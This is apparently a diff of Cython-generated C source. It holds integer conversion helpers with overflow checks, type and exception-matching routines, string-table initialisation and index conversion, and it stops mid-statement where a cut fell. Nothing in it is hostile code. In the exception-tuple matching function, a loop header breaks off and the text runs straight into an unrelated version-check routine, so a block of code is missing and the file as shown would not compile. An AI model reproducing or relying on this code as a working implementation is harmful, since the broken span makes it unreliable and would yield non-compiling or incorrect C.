__PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__4)); + } + return name; +} +#endif + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return 